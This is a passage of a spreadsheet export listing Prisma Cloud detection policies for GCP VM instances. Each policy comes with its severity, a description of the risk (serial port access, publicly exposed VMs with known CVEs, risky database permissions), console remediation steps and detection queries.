      <c r="AI2747" t="inlineStr">
        <is>
          <t>ac470e97-02d5-48f7-a813-fb4a3a51e512</t>
        </is>
      </c>
      <c r="AJ2747" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2747" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2748">
      <c r="A2748" t="inlineStr">
        <is>
          <t>Copy of CIS Controls v8, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST CSF, kashan ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.1.02, ACSC Information Security Manual (ISM), NIST SP 800-172, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS v3.0.0 (GCP) Level 1, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, PCI DSS v4.0, Rehan, CSA CCM v.4.0.1, MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27002:2013, ISO/IEC 27018:2019, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, PCI DSS v4.0, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS Controls v8.1, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST CSF, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, NIST 800-53 Rev 5, PCI DSS v3.2.1, ISO/IEC 27002:2013, CIS v1.3.0 (GCP), SOC 2, CIS Controls v8.1, ISO/IEC 27017:2015, CIS v1.2.0 (GCP), CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, ISO/IEC 27017:2015, ISO 27002:2022, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8, CSA CCM v.4.0.1, CIS v1.1.0 (GCP), ISO/IEC 27002:2013, NIST CSF, ISO/IEC 27002:2013, HITRUST CSF v.11.2.0, Risk Management in Technology (RMiT), kfirdaus AWS Account-CS, RBI Baseline Cyber Security and Resilience Requirements, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, PCI DSS v4.0, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CIS v2.0.0 (GCP) Level 1, CSA CCM v.4.0.1, FFIEC, APRA (CPS 234) Information Security, NIST CSF, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, ITSG-33, ISO/IEC 27002:2013, NIST CSF, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.1, GDPR, NIST CSF, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, CCPA 2018, ISO/IEC 27001:2022, PIPEDA, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), NIST CSF, CSA CCM v.4.0.1, NIST SP 800-172, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, CIS v1.0.0 (GCP), CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2748" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2748" s="2" t="inlineStr"/>
      <c r="D2748" t="inlineStr"/>
      <c r="E2748" t="inlineStr"/>
      <c r="F2748" t="inlineStr"/>
      <c r="G2748" t="b">
        <v>1</v>
      </c>
      <c r="H27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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2748" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2748" t="inlineStr">
        <is>
          <t>GCP VM instances have serial port access enabled</t>
        </is>
      </c>
      <c r="L2748" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2748" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2748" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2748" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2748" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2748" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2748" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2748" t="inlineStr"/>
      <c r="T2748" t="b">
        <v>0</v>
      </c>
      <c r="U2748" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2748" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2748" t="inlineStr">
        <is>
          <t>This policy identifies VM instances which have serial port access enabled. Interacting with a serial port is often referred to as the serial console. The interactive serial console does not support IP-based access restrictions such as IP allowlists. If you enable the interactive serial console on an instance, clients can attempt to connect to that instance from any IP address. So it is recommended to keep interactive serial console support disabled.</t>
        </is>
      </c>
      <c r="X2748" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to Computer Engine (Left Panel)
3. Go to VM instances
4. From the list of VMs, choose the reported VM
5. Click on Edit
6. Under Remote access section, Uncheck 'Enable connecting to serial ports'
7. Click on Save button 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-11
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-11</t>
        </is>
      </c>
      <c r="Y2748" t="inlineStr"/>
      <c r="Z2748" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-instances-list' AND json.rule = metadata.items[?any(key contains "serial-port-enable" and value contains "true")] exists and (status equals RUNNING and name does not start with "gke-")
{"category":"Networking","resourceTypes":["google_compute_instance"]}</t>
        </is>
      </c>
      <c r="AA2748" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2748" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2748" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-196-CKV_GCP_35</t>
        </is>
      </c>
      <c r="AD2748" t="b">
        <v>1</v>
      </c>
      <c r="AE2748" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2748" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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8" t="inlineStr">
        <is>
          <t>a7e6ca7c-8b47-4556-9a34-d2ab88347b4b</t>
        </is>
      </c>
      <c r="AI2748" t="inlineStr">
        <is>
          <t>85abf9ea-0225-4706-af2c-7e0177ebfd88</t>
        </is>
      </c>
      <c r="AJ2748" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2748" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2749">
      <c r="A2749" t="inlineStr"/>
      <c r="B2749" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2749" s="2" t="inlineStr"/>
      <c r="D2749" t="inlineStr"/>
      <c r="E2749" t="inlineStr"/>
      <c r="F2749" t="inlineStr"/>
      <c r="G2749" t="b">
        <v>1</v>
      </c>
      <c r="H27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49" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2749" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2749" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) risk due to publicly exposed and vulnerable GCP VM instance [Java Spring Framework, CVE-2021-22119]</t>
        </is>
      </c>
      <c r="L2749" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2749" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2749" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2749" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2749" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2749" t="inlineStr"/>
      <c r="R2749" t="inlineStr"/>
      <c r="S2749" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2749" t="b">
        <v>0</v>
      </c>
      <c r="U2749" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2749" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2749" t="inlineStr">
        <is>
          <t>This policy identifies GCP Virtual Machines that are publicly exposed and have a known exploitable denial of service vulnerability [Java Spring Framework, CVE-2021-22119].
Denial of service vulnerability is a security flaw that allows a user to make a machine or network resource unavailable. Exploiting this vulnerability affects the availability of resources. The fact that the GCP Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Java Spring Framework [CVE-2021-22119] vulnerability and public exposure reported for the GCP Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X274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CVE-2021-22119
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-22119</t>
        </is>
      </c>
      <c r="Y2749" t="inlineStr"/>
      <c r="Z2749" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-22119'))</t>
        </is>
      </c>
      <c r="AA2749" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2749" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:05</t>
        </is>
      </c>
      <c r="AC2749" t="inlineStr"/>
      <c r="AD2749" t="b">
        <v>1</v>
      </c>
      <c r="AE2749" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2749" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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49" t="inlineStr">
        <is>
          <t>a4437f98-63ab-4653-b3dc-9b66c89eeadc</t>
        </is>
      </c>
      <c r="AI2749" t="inlineStr">
        <is>
          <t>7de42694-c914-4b68-bfe1-24036d7dae00</t>
        </is>
      </c>
      <c r="AJ2749" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2749" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2750">
      <c r="A2750" t="inlineStr"/>
      <c r="B2750" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2750" s="2" t="inlineStr"/>
      <c r="D2750" t="inlineStr"/>
      <c r="E2750" t="inlineStr"/>
      <c r="F2750" t="inlineStr"/>
      <c r="G2750" t="b">
        <v>1</v>
      </c>
      <c r="H27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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2750" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2750" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [OpenLiteSpeed, Multiple CVEs]</t>
        </is>
      </c>
      <c r="L2750" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2750" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2750" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2750" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2750" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2750" t="inlineStr"/>
      <c r="R2750" t="inlineStr"/>
      <c r="S2750" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2750" t="b">
        <v>0</v>
      </c>
      <c r="U2750" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2750" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2750" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to remote code execution (RCE) with exploits in the wild [OpenLiteSpeed, Multiple CVEs]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of OpenLiteSpeed software installed makes it an easy target for an attacker to exploit these vulnerabilities. 
Immediate attention is required to remediate the OpenLiteSpeed vulnerabilities reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X275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CVE-2022-0072
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-0072
   https://nvd.nist.gov/vuln/detail/CVE-2022-0073
   https://nvd.nist.gov/vuln/detail/CVE-2022-0074</t>
        </is>
      </c>
      <c r="Y2750" t="inlineStr"/>
      <c r="Z2750" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-0072, CVE-2022-0073, CVE-2022-0074 - OpenLiteSpeed Remote Code Execution) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-0072', 'CVE-2022-0073', 'CVE-2022-0074'))</t>
        </is>
      </c>
      <c r="AA2750" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2750" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:39</t>
        </is>
      </c>
      <c r="AC2750" t="inlineStr"/>
      <c r="AD2750" t="b">
        <v>1</v>
      </c>
      <c r="AE2750" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2750" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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0" t="inlineStr">
        <is>
          <t>65ccd618-b469-454f-b59d-ce4be2a4abc2</t>
        </is>
      </c>
      <c r="AI2750" t="inlineStr">
        <is>
          <t>1201e7bc-2111-41ff-81d7-dd68a0f18e8c</t>
        </is>
      </c>
      <c r="AJ2750" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2750" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2751">
      <c r="A2751" t="inlineStr"/>
      <c r="B2751" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2751" s="2" t="inlineStr"/>
      <c r="D2751" t="inlineStr"/>
      <c r="E2751" t="inlineStr"/>
      <c r="F2751" t="inlineStr"/>
      <c r="G2751" t="b">
        <v>1</v>
      </c>
      <c r="H27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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2751" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2751" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) exploitation attempt on GCP VM with known exploitable vulnerability [WordPress, CVE-2018-6389]</t>
        </is>
      </c>
      <c r="L2751" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2751" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2751" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2751" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2751" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2751" t="inlineStr"/>
      <c r="R2751" t="inlineStr"/>
      <c r="S2751" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2751" t="b">
        <v>0</v>
      </c>
      <c r="U2751" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2751" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2751" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to Denial of Service (DoS) with exploits in the wild [WordPress, CVE-2018-6389].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of WordPress software installed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the WordPress [CVE-2018-6389] vulnerability reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X275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CVE-2018-6389
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2018-6389</t>
        </is>
      </c>
      <c r="Y2751" t="inlineStr"/>
      <c r="Z2751" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2018-6389 - WordPress &lt;= 4.9.2 DoS via load-scripts or load-styles) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2018-6389'))</t>
        </is>
      </c>
      <c r="AA2751" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2751" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:39</t>
        </is>
      </c>
      <c r="AC2751" t="inlineStr"/>
      <c r="AD2751" t="b">
        <v>1</v>
      </c>
      <c r="AE2751" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2751" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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1" t="inlineStr">
        <is>
          <t>ea64bdbe-9853-4250-9c93-b55ed8ac28ee</t>
        </is>
      </c>
      <c r="AI2751" t="inlineStr">
        <is>
          <t>3e74720f-3b7d-4c96-90a6-9eed805c9b9c</t>
        </is>
      </c>
      <c r="AJ2751" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2751" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2752">
      <c r="A2752" t="inlineStr"/>
      <c r="B2752" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2752" s="2" t="inlineStr"/>
      <c r="D2752" t="n">
        <v>1191</v>
      </c>
      <c r="E2752" t="n">
        <v>0</v>
      </c>
      <c r="F2752" t="n">
        <v>0</v>
      </c>
      <c r="G2752" t="b">
        <v>1</v>
      </c>
      <c r="H27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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2752" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2752" t="inlineStr">
        <is>
          <t>Unauthorized critical database service modifications risk due to a publicly exposed and vulnerable GCP VM instance with database management 'write' permissions</t>
        </is>
      </c>
      <c r="L2752" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2752" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2752" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2752" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2752" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2752" t="inlineStr"/>
      <c r="R2752" t="inlineStr"/>
      <c r="S2752" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2752" t="b">
        <v>0</v>
      </c>
      <c r="U2752" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2752" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2752" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and have database management write access permissions. 
Publicly exposed and vulnerable GCP VM instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Virtual Machines with database management write access permissions could further expand the surface of the attack and grant unauthorized modifications to critical database services hosted on GCP. 
This policy checks for the following risky database management write access permissions: 
'cloudsql.databases.update', 'cloudsql.instances.update', 'datastore.databases.update', 'datastore.entities.update', 'datastore.indexes.update', 'spanner.databases.update', 'spanner.databases.write', 'spanner.instances.update', 'bigtable.clusters.update', 'bigtable.instances.update', 'bigtable.tables.update', 'redis.instances.update', 'memcache.instances.update', 'datamigration.migrationjobs.update', 'datamigration.connectionprofiles.update', 'datamigration.conversionworkspaces.update', 'alloydb.clusters.update', 'alloydb.instances.update', 'gcp.redisenterprise.com-databases.update', 'gcp.redisenterprise.com-subscriptions.update'
Immediate attention is required to grant the least privileges required and remove unwanted risky permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2752"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52" t="inlineStr"/>
      <c r="Z2752" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP VM instance with database management write access permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2752" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2752" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2752" t="inlineStr"/>
      <c r="AD2752" t="b">
        <v>1</v>
      </c>
      <c r="AE2752" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2752" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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2" t="inlineStr">
        <is>
          <t>e5790a88-261d-48df-b4c0-a4f96415eab0</t>
        </is>
      </c>
      <c r="AI2752" t="inlineStr">
        <is>
          <t>60cf2495-32a5-401f-ba56-6bbbf80fe1e2</t>
        </is>
      </c>
      <c r="AJ2752" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2752" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2753">
      <c r="A2753" t="inlineStr"/>
      <c r="B2753" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2753" s="2" t="inlineStr"/>
      <c r="D2753" t="inlineStr"/>
      <c r="E2753" t="inlineStr"/>
      <c r="F2753" t="inlineStr"/>
      <c r="G2753" t="b">
        <v>1</v>
      </c>
      <c r="H275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53" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2753" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2753" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) risk due to publicly exposed GCP VM instance with PHP CGI Argument Injection vulnerability (PHP, CVE-2024-4577)</t>
        </is>
      </c>
      <c r="L2753" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2753" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2753" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2753" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2753" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2753" t="inlineStr"/>
      <c r="R2753" t="inlineStr"/>
      <c r="S2753" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2753" t="b">
        <v>0</v>
      </c>
      <c r="U2753" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2753" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2753" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have a known exploitable Remote Code Execution vulnerability affecting PHP CGI  (CVE-2024-4577).
CVE-2024-4577 is a critical remote code execution (RCE) vulnerability affecting the PHP CGI component of PHP installed on Windows Operating Systems. The PHP CGI module on Windows, when used with Apache, has a flaw where certain characters in command lines can be misunderstood as PHP commands. This happens because Windows may change characters using \"Best-Fit\" behavior with specific code pages. 
Attackers can exploit this vulnerability by crafting requests with specially designed characters, enabling them to inject options into the PHP binary's execution. This can result in running unauthorized PHP code, exposing sensitive data, and performing other malicious actions on the server.The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the PHP (CVE-2024-4577) vulnerability and public exposure reported for the GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2753" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict Internet exposure of reported VM instance based on your business requirements by modifying VPC firewall rules to the trusted IP address,
To modify VPC firewall rules,
1. Login to GCP Console
2. Go to 'VM instance'
3. Identify the VM instance that you want to restrict access to the Internet
4. Update VPC firewall rule that allows Internet access (0.0.0.0/0) for ports (http/80, https/443)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VPC firewall group rules, ensure you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2024-4577
2. Perform thorough backups of software configurations and data before applying updates
3. Refer to given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2024-4577</t>
        </is>
      </c>
      <c r="Y2753" t="inlineStr"/>
      <c r="Z2753" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('GCP VM instance with network path from the internet (0.0.0.0/0) on ports 80/443') AND with : (Vuln WHERE id IN ('CVE-2024-4577'))</t>
        </is>
      </c>
      <c r="AA2753" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2753" t="inlineStr">
        <is>
          <t>2024-08-19 06:33:23</t>
        </is>
      </c>
      <c r="AC2753" t="inlineStr"/>
      <c r="AD2753" t="b">
        <v>1</v>
      </c>
      <c r="AE2753" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2753" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG275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53" t="inlineStr">
        <is>
          <t>1792e94d-6881-44af-9060-a29e45072aa4</t>
        </is>
      </c>
      <c r="AI2753" t="inlineStr">
        <is>
          <t>b01af144-5d1a-4674-907e-1fdb0fccfe25</t>
        </is>
      </c>
      <c r="AJ2753" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2753" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2754">
      <c r="A2754" t="inlineStr"/>
      <c r="B2754" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2754" s="2" t="inlineStr"/>
      <c r="D2754" t="inlineStr"/>
      <c r="E2754" t="inlineStr"/>
      <c r="F2754" t="inlineStr"/>
      <c r="G2754" t="b">
        <v>1</v>
      </c>
      <c r="H27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54" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2754" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2754" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable GCP VM instance with Resource Manager permissions</t>
        </is>
      </c>
      <c r="L2754" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2754" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2754" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2754" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2754" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2754" t="inlineStr"/>
      <c r="R2754" t="inlineStr"/>
      <c r="S2754" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2754" t="b">
        <v>0</v>
      </c>
      <c r="U2754" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2754" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
